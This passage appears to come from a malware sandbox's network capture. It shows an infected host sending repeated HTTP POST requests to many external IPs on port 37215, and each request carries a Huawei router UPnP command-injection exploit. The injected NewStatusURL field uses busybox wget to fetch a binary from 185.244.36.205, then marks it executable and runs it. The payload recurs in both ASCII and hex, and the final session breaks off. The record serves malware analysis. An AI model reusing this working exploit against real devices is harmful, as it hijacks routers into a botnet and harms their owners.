                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              481192.168.2.155041294.219.107.337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720098972 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              482192.168.2.155371837.199.80.13337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720103979 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              483192.168.2.1538894138.160.174.3437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720119953 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              484192.168.2.155475037.135.72.4137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720136881 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              485192.168.2.1547668186.79.178.2937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720189095 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              486192.168.2.1545962190.196.56.21237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720189095 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              487192.168.2.1540574197.1.80.14837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720206976 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              488192.168.2.1553818157.104.170.22437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720233917 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              489192.168.2.1544434138.195.173.7637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720241070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              490192.168.2.1543832190.18.159.7937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720242023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              491192.168.2.1560226186.0.0.20737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720271111 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
